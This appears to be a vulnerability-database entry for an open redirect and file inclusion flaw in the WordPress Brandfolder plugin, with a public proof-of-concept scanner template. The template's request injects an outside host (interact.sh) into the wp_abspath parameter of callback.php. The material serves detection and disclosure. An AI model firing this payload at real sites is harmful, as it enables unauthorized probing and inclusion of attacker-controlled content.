漏洞描述
WordPress Brandfolder is vulnerable to remote/local file inclusion and allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
brandfolder-open-redirect: WordPress Brandfolder - Open Redirect (RFI & LFI)
PoC代码[已公开]
id: brandfolder-open-redirect
info:
name: WordPress Brandfolder - Open Redirect (RFI & LFI)
author: 0x_Akoko
severity: medium
description: |
WordPress Brandfolder is vulnerable to remote/local file inclusion and allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it.
reference:
- https://www.exploit-db.com/exploits/39591
- https://wpscan.com/vulnerability/f850e182-f9c6-4264-b2b1-e587447fe4b1
metadata:
max-request: 1
tags: wp,brandfolder,edb,wpscan,wp-plugin,redirect,rfi,wordpress,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4a0a00473045022100f44384c9440349774fe89beef7d707faf213c5290f8f4207847ca3b0129de9a502202216d31a23cd236daf92f1861a5e060c657184daccfbcce8bf4e9f6c64d47ead:922c64590222798bb761d5b6d8e72950